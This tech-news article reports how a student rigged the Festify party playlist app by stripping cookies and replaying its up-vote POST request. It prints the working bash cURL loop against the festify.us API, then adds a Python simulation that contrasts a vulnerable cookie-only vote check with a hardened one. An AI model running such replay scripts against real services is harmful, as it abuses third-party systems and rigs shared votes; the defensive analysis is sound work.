
Hacker dominates Festify crowd-pleaser party app

Dutch student Roelof Roos has found a way to hijack his fraternity's parties using popular music player Festify.

Roos resides at the Windesheim University of Applied Sciences' Gumbo Millennium fraternity and detailed how frat folk can capture and warp cookies and POST requests to upvote their music to the top of Festify's community playlists, breaking central control of the app.

Rather than allowing the most popular songs on Spotify to be elected to a current playlist based on votes cast on party-goer smartphones, Roos found he could huddle in the corner and hijack the list so his own music would dominate listings.

"Festify uses cookies to register your vote and prevents you from forcing your music on other people," Roos says.

"After adding a song to the queue you can’t vote on it. But that's easily solved.

"Delete your cookies, hard refresh and then you’re able to up-vote a song you just added. Using Chrome Developer tools you’re able to capture the POST request that up votes the song."

Proof of concept.

Roos showed how party hackers can edit cURL requests to strip the cookies and weave them into a script.

#!/bin/bash
x=1
while [ $x -le 99 ]
do
  echo "Up-voted $x times"
  curl 'http://festify.us/api/parties/57d16e88a27dd0a66ec/queue' -H 'Origin: http://festify.us' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-GB,en-US;q=0.8,en;q=0.6' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' -H 'Content-Type: application/json;charset=UTF-8' -H 'Accept: application/json, text/plain, */*' -H 'Referer: http://festify.us/57d16e88a27dd0a66ec' -H 'Connection: keep-alive' --data-binary '{"name":"Afro Circus/I Like To Move It","spotifyID":"0qNBowxGCvy2mSbg9kmEua"}' --compressed
  x=$(( $x + 1 ))
done
echo "AFRO"
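The weakness Roos describes is that the one-vote-per-song check lives entirely in a cookie the client can throw away: a request with no cookie is treated as a brand-new voter. The simulation below is an added example, not Festify's code, and contrasts that cookie-only pattern with a hardened queue where voter identities are minted only by an explicit join step that is capped per source address, and a vote carrying an unknown or missing identity is rejected instead of being reassigned. The `Request` shape, the class names and the cap value are assumptions; the song id is the one from the article's request.

```python
"""Constructed simulation of a party-queue vote handler (not Festify's code)."""
import secrets
from dataclasses import dataclass
from typing import Optional

# Assumed request shape: the client-supplied song, the voter cookie (None if the
# client stripped it) and the source IP seen by the server.
@dataclass
class Request:
    song_id: str
    cookie: Optional[str]
    ip: str


class CookieOnlyQueue:
    """Vulnerable pattern: a missing cookie silently mints a fresh voter identity,
    so every cookie-less request passes the 'already voted' and 'own song' checks."""

    def __init__(self):
        self.votes = {}      # song_id -> set of voter ids that up-voted it
        self.added_by = {}   # song_id -> voter id that queued it

    def _voter(self, req: Request) -> str:
        return req.cookie or secrets.token_hex(8)   # no cookie -> new identity

    def add(self, req: Request) -> str:
        voter = self._voter(req)
        self.added_by[req.song_id] = voter
        self.votes.setdefault(req.song_id, set())
        return voter

    def vote(self, req: Request) -> bool:
        voter = self._voter(req)
        if self.added_by.get(req.song_id) == voter:
            return False   # may not vote on a song you queued yourself
        voted = self.votes.setdefault(req.song_id, set())
        if voter in voted:
            return False
        voted.add(voter)
        return True

    def score(self, song_id: str) -> int:
        return len(self.votes.get(song_id, ()))


class HardenedQueue:
    """Identities exist only server-side, are issued by join(), and join() is capped
    per source address. A vote without a known identity is rejected, not reassigned."""

    MAX_JOINS_PER_IP = 3   # assumed cap; see the note below on shared venue Wi-Fi

    def __init__(self):
        self.voters = {}        # voter id -> ip it was issued to
        self.joins_per_ip = {}  # ip -> identities issued so far
        self.votes = {}
        self.added_by = {}

    def join(self, ip: str) -> Optional[str]:
        if self.joins_per_ip.get(ip, 0) >= self.MAX_JOINS_PER_IP:
            return None
        self.joins_per_ip[ip] = self.joins_per_ip.get(ip, 0) + 1
        voter = secrets.token_urlsafe(16)   # unguessable, so ids cannot be forged
        self.voters[voter] = ip
        return voter

    def add(self, req: Request) -> bool:
        if req.cookie not in self.voters:
            return False
        self.added_by[req.song_id] = req.cookie
        self.votes.setdefault(req.song_id, set())
        return True

    def vote(self, req: Request) -> bool:
        if req.cookie not in self.voters:
            return False   # stripped or unknown cookie: reject, do not mint an id
        if self.added_by.get(req.song_id) == req.cookie:
            return False
        voted = self.votes.setdefault(req.song_id, set())
        if req.cookie in voted:
            return False
        voted.add(req.cookie)
        return True

    def score(self, song_id: str) -> int:
        return len(self.votes.get(song_id, ()))


def replay_loop(queue, song_id: str, attempts: int = 99, ip: str = "203.0.113.7") -> int:
    """Replay the article's loop: repeated up-votes with the cookie stripped."""
    for _ in range(attempts):
        queue.vote(Request(song_id, None, ip))
    return queue.score(song_id)


def demo():
    """Returns (score under the cookie-only queue, score under the hardened queue)."""
    ip, song = "203.0.113.7", "0qNBowxGCvy2mSbg9kmEua"   # constructed IP, song id from the article
    weak = CookieOnlyQueue()
    weak.add(Request(song, None, ip))
    weak_score = replay_loop(weak, song)          # 99: every request counts

    hard = HardenedQueue()
    me = hard.join(ip)
    hard.add(Request(song, me, ip))
    hard.vote(Request(song, me, ip))              # own song: rejected
    replay_loop(hard, song)                       # cookie-less requests: all rejected
    for _ in range(99):                           # minting identities is capped per IP
        tok = hard.join(ip)
        if tok:
            hard.vote(Request(song, tok, ip))
    return weak_score, hard.score(song)
```

The per-IP join cap is deliberately blunt: at a real party most guests sit behind one NAT address, so a production queue would rate-limit joins per address over time, or tie voting to an authenticated account, rather than hard-cap identities. The point that carries over regardless of the limit chosen is the rejection path: a request whose identity the server does not recognise must fail, never be handed a fresh identity.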

The hacker did not say whether he is banned from further frat parties. ®
